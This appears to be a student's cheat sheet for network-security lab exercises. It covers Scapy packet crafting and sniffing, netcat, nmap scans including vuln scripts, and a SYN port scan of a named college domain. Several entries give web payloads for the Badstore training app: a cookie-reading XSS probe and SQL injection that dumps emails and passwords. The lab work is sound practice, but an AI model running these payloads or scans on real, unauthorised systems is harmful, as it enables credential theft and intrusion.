1a Badstore
1b

sudo scapy (to install sudo apt update and sudo apt install python3-scapy) and also for scapy on VM dont use import thingy...

from scapy.all import *
myframe=Ether()/IP() 
myframe.show()
myframe.summary()


packet=Ether()/ARP()
packet.show()
packet.summary()


1c
nano port_scan.sh

#!/bin/bash

read -p "Enter starting port: " start
read -p "Enter ending port: " end

for ((port=start; port<=end; port++))
do
    nc -zv localhost $port
done

chmod +x port_scan.sh

./port_scan.sh

to make the port succed run

sudo nc -l <port>

------------------------------------------------------

2a badstore

2b
sudo scapy

from scapy.all import *

pac=sniff(count=10)
pac.summary()


2c
if config 

1st termianl
sudo nc -l -p <port> (run the cmd first)
 
2nd terminal
sudo nc <ip> <port>

------------------------------------------------------


3a

sudo scapy

from scapy.all import *
result, unanswered = traceroute(["www.example.com", "www.google.com"], maxttl=20)
result.show()

3b
nc example.com 80

GET / HTTP/1.1
Host: www.example.com

HEAD / HTTP/1.1
Host: www.example.com

3c 

nmap -sn 127.0.0.1

nmap -sn 127.0.0.1/24

------------------------------------------------------


4a

ifconfig
nano scanner.py
inside 

import scapy.all as scapy

request = scapy.ARP()
request.pdst = "10.0.2.0/24"   # ✅ correct network add your network which starts with 10.x.x.x

broadcast = scapy.Ether()
broadcast.dst = "ff:ff:ff:ff:ff:ff"

request_broadcast = broadcast / request

clients = scapy.srp(request_broadcast,timeout=2,iface="enp0s3",verbose=False)[0]

print("IP Address\t\tMAC Address")
print("-----------------------------------------")

for element in clients:
    print(element[1].psrc + "\t\t" + element[1].hwsrc)


sudo python3 scanner.py

4b

nc -l -p 5000
http://localhost:5000

in terminal after few seconds 

HTTP/1.1 200 OK
Content-Type: text/plain

Hello from Netcat Server

4c nmap -sn 127.0.0.100-200
nmap -sn 127.0.0.0/24

------------------------------------------------------


5a Badstore
<script>alert(document.cookie)</script>

5b
same as 1c

5c 
nmap 127.0.1.1

nmap -sV 127.0.1.1

------------------------------------------------------


6a Badstore(same as 5a)
<script>alert(document.cookie)</script>

6b 
nmap -O 127.0.1.1

nmap -A 127.0.1.1

6c Badstore
xx' IN (itemnum,sdesc,ldesc) union select email,passwd,123,123 from userdb LIMIT 2 -- 

------------------------------------------------------

7a
sudo python3

from scapy.all import *
packets=IP(dst="8.8.8.8")/ICMP()
send(packets)


7b
nc -l -p 8080 
http://localhost:8080

HTTP/1.1 200 OK
Content-type: text/html
server: nooblinux

<!doctype html>
<title> image </title>
<h1> nature </h1>
<img src = "file:///home/kali/Downloads/raimun-nature-10212379_1920.jpg">

7c Badstore
x' union select count(itemnum),count(itemnum),count(itemnum),count(itemnum) from
itemdb -- 

------------------------------------------------------

8a

run on seed 

from scapy.all import *
import socket

target = "www.bnmit.org"
target_ip = socket.gethostbyname(target)

for port in range(20, 25):
    packet = IP(dst=target_ip) / TCP(dport=port, flags="S")
    response = sr1(packet, timeout=1, verbose=0)

    if response:
        if response.haslayer(TCP) and response[TCP].flags == 18:
            print("Port", port, "is OPEN")


8b 

run this on seed

nmap --script vuln 127.0.1.1

nmap -sV --script vuln 172.17.0.1 -oN result.txt

dir
cat result.txt 


8c Badstore

------------------------------------------------------


9a 
same as 7b
9b
same as 4c

9c Badstore

------------------------------------------------------


10a
nano icmp_monitor.py

from scapy.all import *
def callback(packet):
    if packet.haslayer(ICMP):
        print("ICMP Packet Detected")
        packet.show()

sniff(filter="icmp", prn=callback, count=10)


sudo python3 icmp_monitor.py

in another terminal run
ping 8.8.8.8

10b
same as 5c

10c Badstore

------------------------------------------------------


11a
nano scap.py 

import scapy.all as scapy

request = scapy.ARP()
request.pdst = "10.0.2.0/24"   # ✅ correct network

broadcast = scapy.Ether()
broadcast.dst = "ff:ff:ff:ff:ff:ff"

request_broadcast = broadcast / request

clients = scapy.srp(request_broadcast,timeout=2,iface="enp0s3",verbose=False)[0]

print("IP Address\t\tMAC Address")
print("-----------------------------------------")

for element in clients:
    print(element[1].psrc + "\t\t" + element[1].hwsrc)

 sudo python3 scap.py 


11b
same as 7b

11 c Badstore

------------------------------------------------------

12 a
nano traceroute.py
from scapy.all import *

# Perform traceroute to multiple targets
result, unanswered = traceroute(
    ["www.example.com", "www.google.com"],
    maxttl=20
)

# Display result
result.show()

sudo python3 traceroute.py

12b
same as 7b

12 c
Badstore
